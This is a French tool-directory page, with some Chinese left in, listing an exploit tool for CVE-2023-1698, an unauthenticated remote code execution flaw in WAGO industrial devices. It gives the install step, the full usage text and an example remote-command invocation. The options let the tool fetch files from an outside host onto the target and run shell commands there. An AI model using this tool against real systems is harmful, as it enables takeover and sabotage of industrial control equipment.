Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WAGO-CVE-2023-1698 — Vulnérabilité d'exécution de code à distance dans le système WAGO (CVE-2023-1698) | Kitploit
Outils/GitHubGitHub/thedarknessdied/wago-cve-2023-1698
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubthedarknessdied/wago-cve-2023-1698

WAGO-CVE-2023-1698

Vulnérabilité d'exécution de code à distance dans le système WAGO (CVE-2023-1698)

Voir le dépôt
22il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WAGO-CVE-2023-1698

WAGO系统远程代码执行漏洞(CVE-2023-1698)

Attention

J'ai développé un outil pour les tests locaux et le développement de POC, qui est uniquement destiné à une référence d'apprentissage technique. Veuillez ne pas l'utiliser à des fins illégales. Toutes les conséquences et pertes directes ou indirectes causées par des individus ou des organisations utilisant les informations fournies dans cet article relèvent de la responsabilité de l'utilisateur lui-même et n'ont rien à voir avec l'auteur !!!

image

Description

WAGO est une entreprise spécialisée dans l'interconnexion électrique, l'automatisation et la technologie électronique d'interface. Dans plusieurs produits de WAGO, une vulnérabilité permet à des attaquants distants non authentifiés de créer de nouveaux utilisateurs et de modifier les configurations des appareils, ce qui peut conduire à une exécution de code à distance (RCE), à un déni de service et à des dommages sur l'ensemble du système.

installation

pip install -r requirements.txt

Utilisation de l'outil

root@kitploit:~
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename

Paramètres

--remote-file-include,指定远程文件URL,会通过curl或者wget将文件上传到tmp目录或者当前目录, Spécifiez une URL de fichier distant, qui téléchargera le fichier dans le répertoire tmp ou le répertoire actuel via curl ou wget --local-file-include,解析本地的shell脚本文件并在远端执行,Analysez les fichiers de script shell locaux et exécutez-les à distance --remote-command REMOTE 执行一条系统命令,Exécutez une commande système

Exemple

python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"

Télécharger l’outil